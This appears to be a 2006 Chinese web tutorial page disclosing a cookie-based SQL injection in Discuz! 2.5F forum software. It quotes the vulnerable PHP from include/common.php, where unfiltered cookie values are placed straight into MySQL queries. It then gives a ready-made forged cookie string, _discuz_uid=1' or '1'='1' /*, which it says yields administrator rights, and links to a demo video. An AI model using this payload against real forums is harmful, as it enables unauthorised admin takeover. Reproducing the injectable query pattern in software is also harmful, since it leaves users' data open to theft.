Discuz! 2.5F cookie未过滤漏洞

Discuz! 2.5F cookie未过滤漏洞 - 网络安全 - 电脑教程网

Discuz! 2.5F cookie未过滤漏洞

日期:2006-10-26   荐:
漏洞提供:火狐技术联盟-我非我 [www.wrsky.com]

漏洞说明:
Discuz! 2.5F新版论坛 COOKIE未过滤 通过本地构造可获取管理员权限

具体描述:
文件include\common.PHP中87行

=================================code begin==========================================================
$discuz_uid = $_COOKIE['_discuz_uid']; //这里没有进行过滤检测
$discuz_pw = $_COOKIE['_discuz_pw'];
$discuz_secques = $_COOKIE['_discuz_secques'];

$newpm = $newpmexists = $sessionexists = $adminid = $adminglobal = 0;

$userinfo="m.uid AS discuz_uid, m.username AS discuz_user, m.passWord AS discuz_pw, m.adminid, m.groupid, m.email, m.timeoffset,m.tpp, m.ppp, m.credit, m.timeformat, m.dateformat, m.signature, m.invisible, m.lastvisit, m.lastpost, m.newpm, m.Accessmasks, m.regdate";
//这里直接就放入mysql执行了..
if($sid) {
if($discuz_uid) {
$query = $db->query("SELECT s.sid, s.styleid, s.groupid='6' AS ipbanned, $userinfo FROM $table_sessions s, $table_members m WHERE m.uid=s.uid AND s.sid='$sid' AND CONCAT_WS('.',s.ip1,s.ip2,s.ip3,s.ip4)='$onlineip' AND m.uid='$discuz_uid' AND m.password='$discuz_pw' AND m.secques='$discuz_secques'");
} else {
$query = $db->query("SELECT sid, uid AS sessionuid, groupid, groupid='6' AS ipbanned, styleid FROM $table_sessions WHERE sid='$sid' AND CONCAT_WS('.',ip1,ip2,ip3,ip4)='$onlineip'");
}
if($_DSESSION = $db->fetch_array($query)) {
$sessionexists = 1;
if(!empty($_DSESSION['sessionuid'])) {
$query = $db->query("SELECT $userinfo FROM $table_members m WHERE uid='$_DSESSION[sessionuid]'");
$_DSESSION = array_merge($_DSESSION, $db->fetch_array($query));
}
} else {
$query = $db->query("SELECT sid, groupid, groupid='6' AS ipbanned, styleid FROM $table_sessions WHERE sid='$sid' AND CONCAT_WS('.',ip1,ip2,ip3,ip4)='$onlineip'");
if($_DSESSION = $db->fetch_array($query)) {
clearcookies();
$sessionexists = 1;
}
}
}
if(!$sessionexists) {

..........................................

====================================code end==========================================================



本地cookie构造方式:

sid=dAgM7P; _cookietime=2592000; eXPand_menu=0__3; _discuz_uid=1' or '1'='1' /*; _discuz_pw=wofeiwo; _discuz_secques=hehe

[1] [2]  




漏洞演示动画下载:

http://down.juntuan.net/data/soft/778.html

(出处:http://www.sheup.com)


 [1] [2] 

标签: